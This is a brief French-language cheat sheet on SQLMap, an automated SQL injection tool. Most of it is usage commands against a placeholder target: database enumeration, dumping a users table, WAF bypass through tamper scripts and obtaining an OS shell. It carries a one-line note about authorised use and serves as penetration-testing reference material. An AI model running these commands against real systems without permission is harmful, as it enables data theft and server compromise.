SQLMap — Injection SQL automatisée
★★★★★
Qu'est-ce que SQLMap ?
SQLMap automatise la détection et l'exploitation des injections SQL. Il supporte MySQL, PostgreSQL, Oracle, MSSQL, SQLite... À n'utiliser que sur des cibles autorisées.
Utilisation
# Détection automatique
sqlmap -u "http://target/page?id=1" --batch
# Lister les bases de données
sqlmap -u "http://target/page?id=1" --dbs
# Extraire une table
sqlmap -u "..." -D mabase -T users --dump
# Sur un formulaire POST
sqlmap -r request.txt -p username --batch
# Bypass WAF
sqlmap --tamper=space2comment,between,randomcase
# Shell OS
sqlmap -u "..." --os-shell Capturer la requête avec Burp
# Dans Burp : clic droit sur la requête -> Save item
# sqlmap lit directement le fichier
sqlmap -r request.txt --level=5 --risk=3